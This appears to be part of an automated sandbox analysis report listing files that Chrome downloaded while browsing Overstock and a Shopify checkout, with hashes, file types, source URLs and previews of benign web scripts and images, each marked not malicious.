                                                                                                                                                                                    SHA1:9A966866655E2C061F52D33D7498DE975114F948
                                                                                                                                                                                    SHA-256:8A328317E49399C202F9AC73B9D8694B9A6B126CDB283C6A3105D0F168B47050
                                                                                                                                                                                    SHA-512:CB4781FD73E2327A763A5CBE34DC99F3E281A150F41227A1D93F2DBE5010F5DDCEC9AC0E55E2AD6237640C086CAF03B56FA399883DBBD67205A62EE54278EADA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/stable/4.1/ui.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */(()=>{var t,e,r,n,o={58332:(t,e,r)=>{"use strict";r.d(e,{m:()=>f});var n=r(47408),o=r.n(n),i="[[PowerreviewsGlobalObject]]";function a(t){return window[i][t]}function s(t,e){try{o()(window[i],t,{configurable:!1,enumerable:!1,writable:!1,value:e})}catch(t){0}}window.hasOwnProperty(i)||o()(window,i,{configurable:!1,enumerable:!1,writable:!1,value:{}});var c="@@init",u="stable(10461)";var f={getItem:a,setItem:s,setItemVolatile:function(t,e){window[i][t]=e},initialize:function(){s("version","4.1"),s("buildVersion","10461"),s(c,u)},get isInitialized(){return a(c)===u}}},6224:(t,e,r)=>{r(66803);var n=r(10988).Object,o=t.exports=function(t,e,r){return n.defineProperty(t,e,r)};n.defineProperty.sham&&(o.sham=!0)},88600:(t,e,r)=>{r(4148),r(37708),r(99220),r(64728),r(94196),r(27660),r(31632),r(86088);var n=r(10988);t.exports=n.Promise},89648:(t,e,r)=>{var n=r(71980),o=r(61052),i=TypeError;t.exports=function(t){if(n(t))
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7952)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7953
                                                                                                                                                                                    Entropy (8bit):5.289194478596396
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:2SEGbpRn66PHrfphKP2GeN5rVYkph4xjmNsTbDE21RyEOnHyyU2O9:2SEGN5PLfvKOGe77h4xzTqQ2k
                                                                                                                                                                                    MD5:E67FC8779D4185698C3FC0BEAEB72508
                                                                                                                                                                                    SHA1:0813A4883D2A436C56F4E7AC5289A5D4556F1C21
                                                                                                                                                                                    SHA-256:2BE02C2ED131EC9C7A3D78C99A74123F486FF66EB3758E17412EE1AD9A3A13C5
                                                                                                                                                                                    SHA-512:A661D5895E791B05EA6221810E390EA8D8ED1B2863E3A2DA256BFA4A64977832AF5841228560FA0CFA33D0F5758D8530D1091556CBFF93724AA070D6444082A8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DutyOptions.Cry_EOBi.js
                                                                                                                                                                                    Preview:import{A as E,ba as J,aW as V,J as H,y as F,e as b,b1 as $,D as W,a as e,aU as Z,aa as K,dh as X,a8 as C,aP as Y,cc as O,cu as ee,d4 as ie,bj as ne,ab as M,aS as te,aV as re,ce as x,az as z,cb as se,di as oe,cZ as ae,T as pe,aG as ce,ci as B,dj as le,c9 as ue,u as de,dk as he,a4 as ge,a3 as ye,dl as fe,a_ as me,dm as Se,d as _e,at as ve,q as be,dn as I,dp as De}from"./app.DfgMZONA.js";import{S as Pe,a as k}from"./SubscriptionPriceBreakdown.CxrCP-xw.js";import{S as Ce,D as Re}from"./useAmazonContact.ysZ2sjoF.js";const Le={id:"ca32d1a1360abc73acf9c215a92ce9283175d9aa48b70e909517b6ccfe9467a7",type:"query",name:"ShippingRatesStatusQuery",source:"query ShippingRatesStatusQuery($token:String!){shippingRatesStatus(token:$token)}"},Ie=i=>{const t=E(!1),o=E(!1),r=E(0),a=J(),{value:n,loading:p}=V(),{negotiate:u}=H();return F(()=>{o.current=p},[p]),F(()=>{let c;n&&n.status==="filled"&&n.intermediateRates&&n.shippingRatesStatusToken&&n.progressiveRatesEstimatedTimeUntilCompletion?(t.current=!0,r.c
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (423)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):483
                                                                                                                                                                                    Entropy (8bit):5.251557737815367
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:4ixYvgKOO0g1SaC0CQOxJ9GqTGq/WxNibYn:QgTO0gMa0/IxNu2
                                                                                                                                                                                    MD5:918F3CA651A55EA0C93D9F7507C151CF
                                                                                                                                                                                    SHA1:9DBB4E7CCDE4F005D2A90920C5B996CEEE1E91A6
                                                                                                                                                                                    SHA-256:C01A2D3C1DDEDA8302776E6F15725041CEAC674E05CEEA1D40E95CD59DFF870C
                                                                                                                                                                                    SHA-512:4537CF382A3EA8A6DB4256026224A57106EFC00FD1ACEACFD5400A2FADAA176C8E633F66908A2FC36E636E7A3DB50DD11BD0C339841E8E5EA62357BB1A934385
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/helpers.js
                                                                                                                                                                                    Preview:export const handleize=inputString=>inputString.toLowerCase().replace(/[^a-z0-9]+/g,"-").replace(/(^-|-$)+/g,""),formatMoney=({amount,currencyCode="USD"},cents=!1)=>{let amt=amount;return Number.isNaN(amt)?console.error("utils/format-money.js: No amount value passed."):(cents&&(amt/=100),new Intl.NumberFormat("en-US",{style:"currency",currency:currencyCode,minimumFractionDigits:2,maximumFractionDigits:2}).format(amt))};.//# sourceMappingURL=/cdn/shop/t/224/assets/helpers.js.map.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65460)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):111802
                                                                                                                                                                                    Entropy (8bit):5.268240482340551
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:UZBnKRIUgcLRO26jyoxhbpQORNnNfM7dAg4uO9tboCsf:UvKRi+kbSW/Wd5Csf
                                                                                                                                                                                    MD5:5B9D8BAA112D5D1FE1575BC547A2D11C
                                                                                                                                                                                    SHA1:017C071245A55242CFABDBB70CE8D3D628B7A18F
                                                                                                                                                                                    SHA-256:2E5AA81E02F13EB7E2376331A641BC0BDF3DCFBC769872074CC3134C3FC4D0E3
                                                                                                                                                                                    SHA-512:0642614B00E1CBC28F3F669CE9473D4528F151644D1702001B5503BB9FC3615DB7C77721BD4C652CB3D67E2D6CC8AC4600443D8E2F1B8494334DEF96539193F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js-agent.newrelic.com/nr-spa-1.265.1.min.js
                                                                                                                                                                                    Preview:/*! For license information please see nr-spa-1.265.1.min.js.LICENSE.txt */."use strict";(self["webpackChunk:NRBA-1.265.1.PROD"]=self["webpackChunk:NRBA-1.265.1.PROD"]||[]).push([[478],{7699:(e,t,i)=>{i.d(t,{I:()=>r,N:()=>s});const s=64e3,r=1e6},9527:(e,t,i)=>{i.d(t,{n:()=>c});var s=i(9422),r=i(4777),n=i(4624),a=i(2838),o=i(2614);class c extends r.J{constructor(e,t,i){super(i),this.endpoint=e,this.opts=t||{},this.started=!1,this.timeoutHandle=null,this.aborted=!1,this.harvesting=!1,this.harvest=new n.M(this.sharedContext),(0,a.Q)(this.unload.bind(this)),this.sharedContext?.ee.on(o.tS.RESET,(()=>this.runHarvest({forceNoRetry:!0})))}unload(){this.aborted||(this.opts.onUnload&&this.opts.onUnload(),this.runHarvest({unload:!0}))}startTimer(e,t){this.interval=e,this.started=!0,this.scheduleHarvest(null!=t?t:this.interval)}stopTimer(e=!1){this.aborted=e,this.started=!1,this.timeoutHandle&&clearTimeout(this.timeoutHandle)}scheduleHarvest(e,t){this.timeoutHandle||(null==e&&(e=this.interval),thi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2909)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3118
                                                                                                                                                                                    Entropy (8bit):5.098331190473996
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:jCv4z8oF+a+1tVaPIoSdT97d4ndBQxKuO:uv4z8c+1tVawokhB4dBQs
                                                                                                                                                                                    MD5:208C33781CC5F61D449C6E2E9BC23C22
                                                                                                                                                                                    SHA1:2852C4F99B41A75CB81107F0F2DE66C92DD4E216
                                                                                                                                                                                    SHA-256:D0686A2C6DC4CB9BAFEAC8E3D620EB7C2CC8CBE5E69935B2311433E452921401
                                                                                                                                                                                    SHA-512:66CBAFAB18218041D0E752479FB3CE1579B4CD14B76E6DCFD24EFC91876E1C6A774372EB3ED176A5AA7D3C821EB72443CC7FBE2349C11C368DC2374F4D839E1E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/MarketsProDisclaimer.D4Dihv-c.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressButton.RCpoM8XL.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","assets/PayPalExpressButton.h-S8x8hC.css"])))=>i.map(i=>d[i]);.import{ji as y,a as e,T as h,pl as p,gj as g,c0 as b,pm as P,bH as f,bI as v,_ as k,e as m,m as d,aa as o,bt as i,bP as x,V as C,ab as A,aB as s}from"./app.DfgMZONA.js";function B({id:a,children:n}){const t=y(!1);return e(p.Provider,{value:h(()=>({id:a,completeStatusAtom:t}),[a,t]),children:[n,e(M,{})]})}function M(){const a=g(p),n=b(a.completeStatusAtom);return P(a.id,!n),null}const T=f({load:()=>v(()=>k(()=>import("./component-PayPalExpressButton.RCpoM8XL.js"),__vite__mapDeps([0,1,2,3])))});function R(a){const n=a.fundingSource==="venmo"?"Venmo":"PayPal";return e(B,{id:n,children:e(T,{...a})})}function S({isForExpressCheckout:a=!1}){const n=m(),{merchantPolicies:t}=d(),r=a?"small":"base",c=t?.find(_=>_.handle==="subscription-policy"),l=e(o,{appearance:"subdued",size:r,children:n(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):964
                                                                                                                                                                                    Entropy (8bit):4.894555179641535
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:kJGrO0Pu/dI8d06YaKY4tWe/6n0r5Mi1sy32iCiSoICr4z:sGbPgPdQJr76aMimy32OEz
                                                                                                                                                                                    MD5:674B5A48661A4A079EDC08CB25635952
                                                                                                                                                                                    SHA1:40282BB78DF78F2412A6D2BE27D7D7A41E9EAD53
                                                                                                                                                                                    SHA-256:E4F2692FB9FB1ABCC0CCD83D12609E8D8146E6734BBD98F680F4B8C2AFAD81A1
                                                                                                                                                                                    SHA-512:4845B0E62C6C5C5365C4F206675267EC55CAD91FC0B1877E63BAA459740E57F31E5DB9BE0DD6AEAB521E0684061C602B965FF8DA2FD1EFE6E9BEA825E1BD1CA9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://us.creativecdn.com/topics-membership?ntk=V0RBDrhWHDt_E5vDl5vUB2VrQslMwm7fxXE1WA6PuO6gSu59BrMUnCn38hf6ycZXiqu_tTgvV92fChqAyF2R25xmerCP2QrHW0ip1Hvq3Qo
                                                                                                                                                                                    Preview:<html><head></head><body>.<script>.function ignoreAsyncResult(x) { }..function readResponse(r) {. try {. if (r.ok) {. r.blob().then(ignoreAsyncResult, ignoreAsyncResult);. }. } catch (e) { }.}..function handleTopics(result) {. try {. if (Array.isArray(result)) {. var topicIds = result.map(function (topic) {. return topic.topic;. });. if (topicIds.length > 0 || Math.random() < 0.001) {. fetch('https://us.creativecdn.com/topics-membership?ntk=V0RBDrhWHDt_E5vDl5vUB2VrQslMwm7fxXE1WA6PuO6gSu59BrMUnCn38hf6ycZXiqu_tTgvV92fChqAyF2R25xmerCP2QrHW0ip1Hvq3Qo&t=' + topicIds.join(',')). .then(readResponse, ignoreAsyncResult);. }. }. } catch (e) { }.}..try {. if (document.browsingTopics) {. document.browsingTopics(). .then(handleTopics, ignoreAsyncResult);. }.} catch (e) { }.</script>.</body></html>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2692
                                                                                                                                                                                    Entropy (8bit):7.179621062943366
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxhW1+0NvIuu1WAWMO6/QC7qvqE0zFibvSq9Vysz1lxhq:NBIl/XrxhW1+0NbQWe9QCjE0zFK6qeeQ
                                                                                                                                                                                    MD5:F743D0AD5BD9901592ADA8A3CD251F75
                                                                                                                                                                                    SHA1:66B50D9B7E43340FEBFE771027798474A17173FD
                                                                                                                                                                                    SHA-256:9F244FF76114DACC1436697F8792B9A5900B870DE6FFDCEE9C23AC3BD3C7D719
                                                                                                                                                                                    SHA-512:4367FCB26E22C5676B0023927467ADFB75A1F63DF1D5758041E57DA9551BE5BAB1906A89B59932101DA9A1B99CAABD9C2D665FFF78B6A7290BDDEEF185F64820
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................t.......{..3Q....m\y.}.......y..Z5.!n.......x...,.Y...d*.Oy.:...}<...n6..1...(\.2H...f.o...<..Q.N..... i.?.(.%........B..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.631719675811568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB7QabcOfeIRM2JaJXr364aJEizQVQsLVn:YWtIkW/fAnB7bcOGIRM2J+r5HLVn
                                                                                                                                                                                    MD5:801A3C29D068B83D96B316DBE66A53D2
                                                                                                                                                                                    SHA1:59EC5C0C0E053F6893E4AB32D909130D8BD7729A
                                                                                                                                                                                    SHA-256:AB90CA796A8FF1046911CEBB787ED512598F3A435EB34738CCA8D7F8736F34F4
                                                                                                                                                                                    SHA-512:D057006E82F30555160B75A471DC4E37F127D99AE5E307757C8FD6F2EDC5D641E92DB3C9DD8A198B30B500BF3C0481CF23A965887FA6DE3D64C47299EB88C106
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/39885007/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39885007","rollup":{"average_rating":5.0,"rating_count":1,"review_count":1,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (34521)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):201385
                                                                                                                                                                                    Entropy (8bit):5.447481278055856
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:HK7KioxbKxKGW5iWFsV17KoKioxbKhKBW5m6b6vF6ysFVJF07NdfxFg9IWRn6b6J:HK7KhbKxKijKoKhbKhKjjsNJRH
                                                                                                                                                                                    MD5:340DF0E7EDF2DFA9EA52184578DAA73E
                                                                                                                                                                                    SHA1:B458D84CEB03446CE9930FF09A791D9BC0249274
                                                                                                                                                                                    SHA-256:DA61397D84B1844C8958DAB0ADD4C2E5DF8FD1081608B053C2B573276AFE318D
                                                                                                                                                                                    SHA-512:409A24F67793CB1E172BBF5FC3E44392A619528ADC864085B38D00BB71E0F167070061814B0F0B34BC07871C39EFA074D1435A33252E93EACC5CE05C96122619
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/js/os-templates.6.0.41.min.js
                                                                                                                                                                                    Preview:this.Handlebars=this.Handlebars||{},this.Handlebars.templates=this.Handlebars.templates||{},this.Handlebars.templates["cluborewards-footer"]=Handlebars.template(function(Handlebars,depth0,helpers,partials,data){return this.compilerInfo=[4,">= 1.0.0"],helpers=this.merge(helpers,Handlebars.helpers),data=data||{},'<div class="dynaban-footer-clubORewards"><div class="os-icon os-icon-club-o-rewards"></div><div class="clubo-text-container"><span class="clubo-heading reward-heading">EXTRA REWARDS STORE</span><span class="clubo-text bold">Exclusively for Club O Gold Members</span><span class="clubo-text italic">Earn up to 40% back</span></div><a class="clubo-btn os-btn btn-md loyalty" data-tid="SW:FO:ClubOXRewards:ShopNow" href="https://www.overstock.com/Club-O-Extra-Rewards-Store,/club-o-extra-reward,/results.html" target="_blank">Shop Now</a></div>'}),this.Handlebars.templates["clubo-footer"]=Handlebars.template(function(Handlebars,depth0,helpers,partials,data){this.compilerInfo=[4,">= 1.0.0
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2420
                                                                                                                                                                                    Entropy (8bit):7.078447920125524
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxWtPEK4R8U3uE97f08gYlLKxYqB4LOlLmEQXzMytWY:NBIl/XrxKRIuENc8gYUxYqCymbAytWY
                                                                                                                                                                                    MD5:776A378F3CB62446DF223277FEADF36E
                                                                                                                                                                                    SHA1:CF798C43DBAB1FDF73B6216E81595FB24FC3B42A
                                                                                                                                                                                    SHA-256:8B7EFE92AC6676596BFF855751CFBF1F946622C921B5E904CDF196BB6504A0C3
                                                                                                                                                                                    SHA-512:802E3F5278EF77AD0C0AA4EDFAA99B18531E138D9716F56072B5E8D34ACB774248C741847139F69B4AED36623B72FF5D424FFF8D13F4543D06B70FF4E0652A7E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`..Q......................y.... 6O.;...K..p....C..f.GZ.ud.[5.4.q.....Ri..S;..Yv..5B.,....uK..J......T..k}...G.......#.Fz....p.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1515
                                                                                                                                                                                    Entropy (8bit):6.118946980948908
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZg9NHiJBfI5oWdSJfI4eI3UVGkNkmh3:NBIl/XflVxSrCHTWd6fI1GkNkW3
                                                                                                                                                                                    MD5:7E2F8A9C204671ADE519FD77C9BCA846
                                                                                                                                                                                    SHA1:9BFB7C858450EEA508E2800F3AA68E64F4AB6D86
                                                                                                                                                                                    SHA-256:9F3392A2DF3EC0B4D91543497CEDDF663CB1EC6C7BEDA248DA07D17CC083EE93
                                                                                                                                                                                    SHA-512:F7B486DD073CA9A604C8D00FBC2A99A36AF28F5F65FB4F69DB541857AA792F24F9F12C59AA3F2BE7255216D28C25E72B459574D1B4A75AD7F4DDB9382500EAAA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................X............9...H.FGQ..Sr.1b.'arLI..J...f\....b@ ..............4.......................!.1."AQa..2Bq......3@RSrs..........?........sa.....t....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 168180
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):46171
                                                                                                                                                                                    Entropy (8bit):7.994442356599265
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp5b/ozbuiKgsJOvYn0RCXbCWLqkJ:GU1wlZ5Su8dmY/T85besJ6c9LqkJ
                                                                                                                                                                                    MD5:8C746C08B412D2FD04BCA8389983D1CF
                                                                                                                                                                                    SHA1:404414E2495B7B20F08257FE8ACDAFAF825AF461
                                                                                                                                                                                    SHA-256:53B256B36E48EC1DD0EEF348C3ADED204AE7EE5FD451F5B5CC24B9716C435A2A
                                                                                                                                                                                    SHA-512:FD5EB0881B5AB40BFB11B8F3218B347B3EAD83D79B9D1FC48D865108090FBCDA275BEBB9080FE8FB4965984B44826EE8BD724033771249DFE3D23DB6DB063150
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1228
                                                                                                                                                                                    Entropy (8bit):6.237569631497119
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:0STCIl/X2YlXWI2PU26skLDEoJnsh0sJgzkP:wIl/XflBfW0sJgkP
                                                                                                                                                                                    MD5:E17836B561F55B258731765307DCE86B
                                                                                                                                                                                    SHA1:8A2DE3BDF174BF074A407CA6737907D7C211CA2A
                                                                                                                                                                                    SHA-256:518DE1DFF6C5D97026027DD853F2558EFF80635434ED94A32C65876CF983EEAC
                                                                                                                                                                                    SHA-512:D09C6E580EF53F5B252E11D3ED1F3B25F93C8441A3763AE31F51025E5BE6CBE6331D8BB53EBA877F7FB06796DAA39695AF44FA73945AB588686AEF13AB4BC588
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_aa17ab58-5bfd-49af-aa69-f4e025df7ce0.jpg?v=1729325087&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 4...0....*P.P.>1..B.!!.... ....j....u..,.?.p.~..v.e..F.D8.-..Mt.-...x;.+...o....S....../.w..Y..ZbZP............f..i.....Q.J.{..=...........:A2..,.......].w........^...B...G.....C.wR@..GWp..w.....Hc.V0a(...e.............a..t..H.x2E1.5.....h.+...b....!...e..R..~~.>.(/o.@9.Z.2.j.^..x.T....b..;..C...r.7..O.n....uRp.Z....g..4.~q...6.2...C...@l.8.6.@_D..g.0.).:....e.rgx.E..8.4;...>.O.........r..4.....l............u......Z.g'..L.......\..LB.iY1.1f<....H..t.@"Q...N.........|.....-....c.L...$\.l.D.LM..8..X.....w.l.+.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (11481)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11579
                                                                                                                                                                                    Entropy (8bit):5.090747284388086
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:RaqhvCOeD4Bd20OZRD208Kwlqlns/NyTkmIN16SxXxkGyx1BNXa/ogENqxW9YbI5:RaqhqZKGk7U0yTw5tyPBNq/ogENqxZM5
                                                                                                                                                                                    MD5:54D2095858C4D114A9417C57C618C727
                                                                                                                                                                                    SHA1:8FB513592C16FE4C1836FECD1B9BF9B59522CD61
                                                                                                                                                                                    SHA-256:A776B67DDA997CD1FF511D346B82E37342722D545A3E302B9A67776365589333
                                                                                                                                                                                    SHA-512:9A3F0F6A2291E52D7D1BD2A1F521FB3EF2C1D0BA504B2C1EB31F59E02DA6C3CA1CE61CE8E8F3E6F52E68B5ABC54F48A81522833CC36CA6EE770E42AF73BEA685
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("media-gallery")){class MediaGallery extends HTMLElement{constructor(){super(),Shopify.designMode?setTimeout(()=>this.init(),200):this.init()}disconnectedCallback(){window.removeEventListener("on:debounced-resize",this.resizeHandler),this.resizeInitHandler&&window.removeEventListener("on:debounced-resize",this.resizeInitHandler),this.zoomInitHandler&&window.removeEventListener("on:debounced-resize",this.zoomInitHandler)}init(){this.section=this.closest(".js-product"),this.mediaGroupingEnabled=this.hasAttribute("data-media-grouping-enabled")&&this.getMediaGroupData(),this.stackedScroll=this.dataset.stackedScroll,this.stackedUnderline=this.dataset.stackedUnderline==="true"&&!this.mediaGroupingEnabled,this.isFeatured=this.dataset.isFeatured==="true",this.viewer=this.querySelector(".media-viewer"),this.thumbs=this.querySelector(".media-thumbs"),this.thumbsItems=this.querySelectorAll(".media-thumbs__item"),this.controls=this.querySelector(".media-ctrl"),this.prevBtn=t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
